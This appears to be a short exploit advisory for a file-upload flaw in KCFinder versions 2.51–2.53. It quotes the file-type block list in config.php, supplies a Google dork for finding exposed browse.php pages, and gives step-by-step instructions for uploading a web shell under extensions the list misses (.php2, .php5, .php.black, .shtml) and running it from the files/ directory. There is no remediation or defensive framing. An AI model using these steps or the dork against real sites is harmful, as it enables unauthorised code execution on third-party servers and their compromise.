KcFinder 2.53 Shell Upload Vulnerability

1. Exploit Title : KCFinder Upload Shell Vulnerability Date : 24/04/2014 Google Dork : inurl:/kcfinder/browse.php Exploit Author : Lordbonsky Home : http://www.idc-team.net Discovered By : B0nsky404 Vendor Homepage : http:// kcfinder.sunhater.com/ Version : 2.51 – 2.53 Tested on : Windows 8 & Linux Events location bug: http://[localhost]/[path]/kcfinder/ config.php Line 51: ‘deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”, Exploit:http://[localhost]/kcfinder/browse.php http://[localhost]/[path]/kcfinder/ browse.php Proof: STEP 1: Go to target link http://localhost/KCFinder/browse.php STEP 2: Then select your folder from the left panel STEP 3: Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defpage.html ] STEP 4: Shell execution path http://[localhost]/[path]/files/shell.php2 OR http://[localhost]/[path]/files/files/ shell.php2